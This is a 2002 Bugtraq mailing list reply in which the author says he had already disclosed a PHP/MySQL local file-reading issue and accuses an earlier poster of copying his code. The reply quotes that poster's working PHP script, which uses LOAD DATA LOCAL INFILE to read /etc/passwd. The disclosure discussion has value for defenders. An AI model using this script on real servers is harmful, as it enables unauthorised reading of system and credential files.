[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Re: File reading vulnerable in PHP and MySQL (Local Exploit)
From: Dave Wilson <dw () botanicus ! net>
Date: 2002-11-27 9:54:58
[Download RAW message or body]
Hi there,
Please see http://botanicus.net/dw/sec.html - I wrote about this in
February. Prior to that, other people have claimed to have come across
this too.
On Tue, Nov 26, 2002 at 10:57:52AM -0000, Hai Nam Luke wrote:
> Attacker can use PHP and mySQL to read some local file following this way:
>
> # Create a database (mySQL) and upload this file to your server
> PHP Code: viewfile.php (programmed by Luke)
>
> ======================================================
> <?
> // config this data
> $dbhost = "";
> $dbuser = "";
> $dbpasswd = "";
> $dbname = "";
> $file = "/etc/passwd"; // filename that you wanna view
>
> // shell code
> echo "<pre>";
>
> mysql_connect ($dbhost, $dbuser,
> $dbpasswd);
> $sql = array (
> "USE $dbname",
>
> 'CREATE TEMPORARY TABLE ' . ($tbl
> = 'A'.time
> ()) . ' (a LONGBLOB)',
>
> "LOAD DATA LOCAL INFILE '$file' INTO
> TABLE
> $tbl FIELDS "
> . "TERMINATED BY
> '__THIS_NEVER_HAPPENS__' "
> . "ESCAPED BY '' "
> . "LINES TERMINATED BY
> '__THIS_NEVER_HAPPENS__'",
>
> "SELECT a FROM $tbl LIMIT 1"
> );
Umm, this is my code. Please check any good Bugtraq archive for proof of
this fact. This is pretty much identical, except my English is better
:-).
> Luke (HVA)
> http://www.hackervn.net
Dave Wilson.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic